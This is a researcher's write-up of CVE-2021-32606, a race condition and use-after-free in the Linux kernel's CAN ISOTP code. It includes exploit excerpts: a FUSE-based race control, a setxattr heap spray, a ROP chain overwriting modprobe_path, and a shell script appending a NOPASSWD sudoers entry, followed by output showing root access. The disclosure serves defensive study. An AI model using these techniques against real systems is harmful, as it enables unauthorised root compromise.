CVE-2021-32606: CAN ISOTP local privilege escalation

This article is about a recent vulnerability in the linux kernel labeled CVE-2021-32606. The vulnerable part of the kernel was the ISOTP CAN networking protocol in the CAN networking subsystem. In the following, I am going to cover the vulnerability and my exploitation approach which led to successful local privilege escalation to root.

Vulnerability

The vulnerability is a race condition which allowed to modify socket options after the socket was bound. For this reason, the race condition occurs between isotp_setsockopt() and isotp_bind(). In the case of the CAN ISOTP protocol, if socket options other than default shall be used, the new socket options have to be accordingly set with isotp_setsockopt() before binding the socket. Especially with the introduction of CAN_ISOTP_SF_BROADCAST support in commit 921ca574cd38, no further change of socket options is allowed, as this might result in other socket behavior than previously expected.

Every ISOTP socket has the following struct can_isotp_options which can be changed with isotp_setsockopt().

struct can_isotp_options {
        __u32 flags;            /* set flags for isotp behaviour.       */
	...

When an ISOTP socket is about to be bound in isotp_bind(), the flags are checked against CAN_ISOTP_SF_BROADCAST. In case CAN_ISOTP_SF_BROADCAST is set, no CAN receiver will be registered. A CAN receiver is a feature which will be automatically run as a software interrupt in order to receive incoming CAN messages.

static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
{
	...
	/* do not register frame reception for functional addressing */
	if (so->opt.flags & CAN_ISOTP_SF_BROADCAST)
		do_rx_reg = 0;
	...
	if (do_rx_reg)
		can_rx_register(net, dev, addr->can_addr.tp.rx_id,
				SINGLE_MASK(addr->can_addr.tp.rx_id),
				isotp_rcv, sk, "isotp", sk);
	...
	so->bound = 1;
	...

Above in isotp_bind(), we can see that can_rx_register() won't be called if CAN_ISOTP_SF_BROADCAST is not set. In isotp_setsockopt(), we can either set or remove this flag.

The following excerpt shows isotp_setsockopt() from net/can/isotp.c

static int isotp_setsockopt(struct socket *sock, int level, int optname,
			    sockptr_t optval, unsigned int optlen)
{
	struct sock *sk = sock->sk;
	struct isotp_sock *so = isotp_sk(sk);
	int ret = 0;

	if (level != SOL_CAN_ISOTP)
		return -EINVAL;

	if (so->bound)							[1]
		return -EISCONN;

	switch (optname) {
	case CAN_ISOTP_OPTS:
		if (optlen != sizeof(struct can_isotp_options))
			return -EINVAL;

		if (copy_from_sockptr(&so->opt, optval, optlen))	[2]
			return -EFAULT;
		break;
	...

If the socket is already bound [1], we return from the function earlier, as we cannot modify the socket options of a bound socket. In case the socket is not bound, struct can_isotp_options will be copied [2] from user space.

Now consider the following race condition between isotp_setsockopt() and isotp_bind():

isotp_setsockopt() is called and we pass the check at [1] since the socket is unbound.
isotp_bind() is by default called without CAN_ISOTP_SF_BROADCAST, resulting in the registration of a CAN receiver. In the end, so->bound will be set to 1.
The socket was just bound but we are still in isotp_setsockopt(). If the timing is right, we will change struct can_isotp_options with flags set to CAN_ISOTP_SF_BROADCAST. Notice that the copy [2] will happen on an already bound socket.

At this place, we now have a socket with a registered CAN receiver, but according to its newly set flags to CAN_ISOTP_SF_BROADCAST, this shouldn't have happened.

After a successful race condition, we now close the socket and isotp_release() is called.

static int isotp_release(struct socket *sock)
{
	...

	/* remove current filters & unregister */
	if (so->bound && (!(so->opt.flags & CAN_ISOTP_SF_BROADCAST))) {		[1]
		if (so->ifindex) {
			struct net_device *dev;

			dev = dev_get_by_index(net, so->ifindex);
			if (dev) {
				can_rx_unregister(net, dev, so->rxid,		[2]
						  SINGLE_MASK(so->rxid),
						  isotp_rcv, sk);
				dev_put(dev);
			}
		}
	}

	...

The check at [1] assures that the CAN receiver will be unregistered if flags weren't set to CAN_ISOTP_SF_BROADCAST. But because we illegally changed flags after binding the socket, it is now assumed that we didn't register a CAN receiver so none will be unregistered.

At this place, we now have closed the ISOTP socket, but we still have a registered CAN receiver. In case another socket sends messages to our previously freed socket, a softirq will call isotp_rcv() on the freed struct isotp_sock, resulting in use-after-free.

Exploitation

In order to allow successful exploitation, the following conditions are required:

The kernel needs to come with config option CONFIG_USER_NS enabled. This option is needed to set up a sandbox for the unprivileged user, allowing to autoload VCAN and ISOTP modules. The first is needed to set up a CAN networking device for our ISOTP sockets, and the latter is needed to create the aforesaid sockets.
An infoleak is needed in order to bypass KASLR and to get the address of the GS register. The usage of the latter will be explained soon. In my case, I could trigger a kernel warning which would effectively display the Oops message in kernel logs. Kernel logs can be read on distributions which haven't restricted access to dmesg via CONFIG_SECURITY_DMESG_RESTRICT.

Exploitation is possible on machines with SMEP, SMAP, KASLR and KPTI enabled.

FUSE technique

For this particular exploit, I originally wanted to use the userfault technique to reliably control the race condition. Due to userfault being recently disabled, I looked for other possibilities and stumbled upon a technique which was used by Jann Horn to control a race condition, in the past. I think because of userfault working well in the past, this technique might have not been frequently used as much, but it's still a worthy approach to make this particular exploit reliable.

One of the drawbacks of the FUSE technique I see is that it might not come preinstalled on some distributions. On OpenSUSE Tumbleweed with XFCE desktop FUSE came preinstalled and was accessible to unprivileged users. Repeated tests have shown, that there is still a good chance to exploit this vulnerability without FUSE or userfault, but the reliability would potentially be decreased.

In short, FUSE stands for Filesystem in Userspace and allows to mount self-made filesystems in a user-controlled directory. For this exploit, I used a template filesystem from libfuse called ``hello` which was modified to be effectively used in this exploit.

The following excerpt shows the hello_read() function from the hello filesystem

static int hello_read(const char *path, char *buf, size_t size, off_t offset,
                struct fuse_file_info *fi)
{
        /* wait inside isotp_setsockopt() */
        sleep(2);						

        int flags = CAN_ISOTP_SF_BROADCAST;
        struct can_isotp_options opts;
        size_t len = sizeof(opts);

        memset(&opts, 0, sizeof(opts));
        opts.flags = flags;

        if (offset < len) {
                if (offset + size > len)
                        size = len - offset;
                memcpy(buf, &opts + offset, size);
        } else {
                size = 0;
        }

        return size;
}

In this case, any read associated with the hello filesystem will be redirected to hello_read(). Inside hello_read(), we sleep() for 2 seconds, effectively halting the kernel execution at copy_from_sockptr() in isotp_setsockopt().

	if (copy_from_sockptr(&so->opt, optval, optlen))
		return -EFAULT;

In the meanwhile, isotp_bind() will finish and bind the socket, finally setting so->bound to 1. Then, we proceed with copying flags containing CAN_ISOTP_SF_BROADCAST to the kernel space.

void setup_fusefs(void)
{
        fuse_fd = open("mnt/hello", O_RDWR);				       	   [1]
        if (fuse_fd < 0)
                die("failed to open fuse fd");

        fuse_map = mmap(NULL, sizeof(struct can_isotp_options),
				PROT_READ | PROT_WRITE, MAP_SHARED, fuse_fd, 0);   [2]

        if (fuse_map == MAP_FAILED)
                die("failed to map with fuse fs");
}

In my exploit, I get a fd of the filesystem [1] and mmap memory [2] similarly to userfault. This mmap() will be associated with the previously opened fuse_fd. As already mentioned, any copy from the kernel space from this mmap'ed memory will be handled by hello_read().

At this point, we have a properly set up FUSE filesystem which will help us to reliably win the race condition between isotp_setsockopt() and isotp_bind().

How does the controlled race condition scenario look like?

isotp_setsockopt() is called on an unbound socket.
- copy_from_sockptr() wants to copy struct can_isotp_options from the user space
- hello_read() is called and goes to sleep() for 2 seconds, kernel execution is now halted!
while we are in setsockopt(), we now call isotp_bind()
- CAN_ISOTP_SF_BROADCAST flag is not set, so a CAN receiver will be registered
- return from isotp_bind(), the socket is now successfully bound
during the 2 seconds isotp_setsockopt() was halted, we expect isotp_bind() to be completed
- memcpy() inside hello_read() will now copy the struct to kernel space
- we set the CAN_ISOTP_SF_BROADCAST flag for a bound socket!

Further exploitation

As already mentioned, closing the socket won't unregister the CAN receiver and we cause a few use-after-free's inside isotp_rcv() whenever we send a message to the freed socket.

My approach focuses on spraying the freed struct isotp_sock so we can reliably pass the checks in isotp_rcv() and call an overwritten function pointer. Because the struct is pretty big (on my machine it was 17432 bytes) and exceeds the biggest kmalloc cache kmalloc-8k, it won't be allocated in any of the generic SLAB caches. Instead, the page allocator will allocate it.

Looking after a feasible spray primitive, I ended up with choosing setxattr(). This syscall was mainly used in combination with userfault, as setxattr() frees the buffer right after copying it. In fact, we could probably hold it with FUSE, but after repeated tests I noticed that setxattr() alone is also very reliable in this case. The most important thing with this approach is that setxattr() does not erase the buffer after freeing it, so the previously copied bytes will remain in memory.

Theoretically, some other object could be allocated right after we sprayed the freed socket, but in practice it does not provoke any crashes and in the worst case we can simply rerun the exploit and try again. In the following, I will explain this further.

static void isotp_rcv(struct sk_buff *skb, void *data)
{
	/* Strictly receive only frames with the configured MTU size
	 * => clear separation of CAN2.0 / CAN FD transport channels
	 */
	if (skb->len != so->ll.mtu)							[1]
		return;
	...
	switch (n_pci_type) {
	...
	case N_PCI_SF:
		/* rx path: single frame
		 *
		 * As we do not have a rx.ll_dl configuration, we can only test
		 * if the CAN frames payload length matches the LL_DL == 8
		 * requirements - no matter if it's CAN 2.0 or CAN FD
		 */

		/* get the SF_DL from the N_PCI byte */
		sf_dl = cf->data[ae] & 0x0F;

		if (cf->len <= CAN_MAX_DLEN) {
			isotp_rcv_sf(sk, cf, SF_PCI_SZ4 + ae, skb, sf_dl);		[2]
	...

In the beginning of isotp_rcv(), the length of the received sk_buff is checked against so->ll.mtu. The skb->len of the received message is by default 16, so so->ll.mtu also has to be 16. If this is not the case, we return from the function. Because we control the whole struct isotp_sock with the setxattr() spray, we can set so->ll.mtu to 16. This is also why this seemingly unreliable spraying approach is still very reliable: In case the spray will fail, it's very unlikely that isotp_rcv() will read exactly 16 at the position of so->ll.mtu. For any rubbish value other than 16, we will safely return from isotp_rcv() and we can try again.

After the initial check [1], isotp_rcv_sf() will be called [2] to receive a so-called CAN single frame message in case the message length is <= 8.

static int isotp_rcv_sf(struct sock *sk, struct canfd_frame *cf, int pcilen,
			struct sk_buff *skb, int len)
{
	...
	hrtimer_cancel(&so->rxtimer);							[1]
	so->rx.state = ISOTP_IDLE;
	...
	if ((so->opt.flags & ISOTP_CHECK_PADDING) &&					[2]
	    check_pad(so, cf, pcilen + len, so->opt.rxpad_content)) {
		/* malformed PDU - report 'not a data message' */
		sk->sk_err = EBADMSG;
		if (!sock_flag(sk, SOCK_DEAD))
			sk->sk_error_report(sk);					[3]
		return 1;
	}

At [1], one of the hrtimers is cancelled by calling hrtimer_cancel(). I won't cover hrtimers in this article in detail. All you have to know is that we need to overwrite the freed socket's memory in the place of so->rxtimer.base in order to prevent kernel crashes. struct hrtimer has a pointer to struct hrtimer_clock_base. hrtimer_clock_base is defined per CPU core. Fortunately, the abovementioned GS register holds the address of one of the core's per-CPU data, and adding a constant offset to this address will give us a valid struct hrtimer_clock_base.

After a couple of checks in hrtimer_cancel(), the socket's flags are checked [2] against ISOTP_CHECK_PADDING. These flags are exactly the ones where CAN_ISOTP_SF_BROADCAST is stored. We can provide this flag along with some other flags needed in check_pad(). The combination of the user-controlled message length and the padding flags results in the message being seen as malformed. Accordingly, the socket will call sk_error_report() [3] to report this issue. Just like we can control any single byte of struct isotp_sock, it's also possible to overwrite the sk_error_report() pointer. At this point, we have successfully managed to achieve arbitrary kernel execution.

One may ask, where are we supposed to forward the execution? Jumping to invalid places led to a kernel panic, but then I noticed that the RDI register stored the address of our freed struct isotp_sock. I decided to perform a stack pivot to this address and start executing ROP gadgets. In order to take use of the ROP gadgets found in the vmlinux image, I use the leaked KASLR offset from the warning in kernel logs. When I assembled the ROP chain, I took into account that the space might not be enough and eventually some important data might be overwritten. Because of that, I almost immediately moved the stack pointer somewhere in the middle of the sprayed target where no data would explicitly be used by isotp_rcv(). This is possible because of the large size of struct isotp_sock which makes it feasible to place the payload inside the object. In this example, I place my extended ROP chain at offset 0x718.

	/* overwrite sk_error_report() (offset 0x2b8) with stack pivot */
	dst = (uint64_t *)(p + 0x2b8);
	*dst = ROP_PUSH_RDI__JUNK__POP_RSP__RET + kaslr_offset;

	/* ROP at isotp_sock + 0x8 */
	*dst = ROP_RET_0x700 + kaslr_offset;
	dst++;
        /* jump to extended rop chain at isotp_sock + 0x10 */
        *dst = ROP_RET + kaslr_offset;

	/* extended rop chain */
        rop = (uint64_t *)(p + 0x718);
        *rop++ = ROP_POP_RAX__RET + kaslr_offset;
        *rop++ = 0x782f706d742f; /* /tmp/x */
        *rop++ = ROP_POP_RCX__RET + kaslr_offset;
        *rop++ = MODPROBE_PATH + kaslr_offset;
        *rop++ = ROP_MOV_RAX_INTO_RCX__RET + kaslr_offset;
        *rop++ = ROP_POP_RAX__RET + kaslr_offset;
        *rop++ = DO_TASK_DEAD + kaslr_offset;			[1]
        *rop++ = ROP_JMP_RAX + kaslr_offset;

The following image shows the sprayed target to overwrite struct isotp_sock

The ROP chain consists of a technique to overwrite modprobe_path. In case any user wants to execute a file with an invalid file signature, the program at modprobe_path will be executed with root privileges. This technique was apparently used in some CTF challenges and it was thoroughly described by lkmidas in his blog. In case you want to learn about it in depth, check out his well-written article. Once we have overwritten modprobe_path, the kernel thread will be stopped in do_task_dead() [1]. This step is needed as we are already done with exploiting the kernel, and any further execution of our hijacked kernel thread might result in severe kernel crashes.

ret = system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy;		[1]
	chmod +x /tmp/dummy");
if (ret != 0)
	die("/tmp/dummy creation failed");

ret = system("echo '#!/bin/sh' > /tmp/x; \
	echo 'echo \"noprivs ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers'	[2]
		>> /tmp/x; chmod +x /tmp/x");
if (ret != 0)
	die("/tmp/x creation failed");

In short, I create a file /tmp/dummy [1] with the invalid signature 0xff 0xff 0xff 0xff. I also create a file /tmp/x [2] which is the overwritten modprobe_path. This small shell script will add the unprivileged user to /etc/sudoers, allowing to escalate the user's privileges to root.

Combining everything together

At this place, I covered all of the steps which now have to be combined. The following sequence is used in my exploit:

trigger warning to retrieve kernel addresses from kernel logs
setup FUSE filesystem and allocate memory with mmap()
setup user namespace to autoload VCAN and ISOTP modules
setup CAN networking device with VCAN
open ISOTP socket 1
- this socket will be exploited with the race condition
open ISOTP socket 2
- this socket will only be used to send a CAN message to socket 1
win race condition on socket 1
close socket 1
spray the page allocator with setxattr() containing our payload to overwrite socket 1
send CAN message from socket 2 to socket 1
isotp_rcv() is run as software interrupt for socket 1
in isotp_rcv(), pass checks and call malicious sk_error_report() pointer to perform the stack pivot
stack pivot leads to ROP chain execution at struct isotp_sock
execute extended ROP chain, overwrite modprobe_path
try executing /tmp/dummy, /tmp/x will be executed with root privileges
the unprivileged user is now added to /etc/sudoers and we can now get a root shell

Exploit output

noprivs@suse:~/expl> uname -a
Linux suse 5.12.0-1-default #1 SMP Mon Apr 26 04:25:46 UTC 2021 (5d43652) x86_64 x86_64 x86_64 GNU/Linux
noprivs@suse:~/expl> ./lpe
[+] entering setsockopt
[+] entering bind
[+] left bind with ret = 0
[+] left setsockopt with flags = 838
[+] race condition hit, closing and spraying socket
[+] sending msg to run softirq with isotp_rcv()
[+] check sudo su for root rights
noprivs@suse:~/expl> sudo su
suse:/home/noprivs/expl # id
uid=0(root) gid=0(root) groups=0(root)

Notice

Researching and exploiting the vulnerability was a great opportunity to expand my knowledge about the Linux kernel. I hope you enjoyed the article. In case of further questions feel free to reach out to me by writing me an e-mail (nslusarek@gmx.net).

Also, I'm currently looking for an internship in infosec in Germany/Europe. In case you are interested, please reach out to me via e-mail.

References

https://bugs.chromium.org/p/project-zero/issues/detail?id=808

https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/

https://www.openwall.com/lists/oss-security/2021/05/11/16

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

cve-2021-32606.md

cve-2021-32606.md

CVE-2021-32606: CAN ISOTP local privilege escalation

Vulnerability

Exploitation

FUSE technique

Further exploitation

Combining everything together

Notice

References

Files

cve-2021-32606.md

Latest commit

History

cve-2021-32606.md

File metadata and controls

CVE-2021-32606: CAN ISOTP local privilege escalation

Vulnerability

Exploitation

FUSE technique

Further exploitation

Combining everything together

Notice

References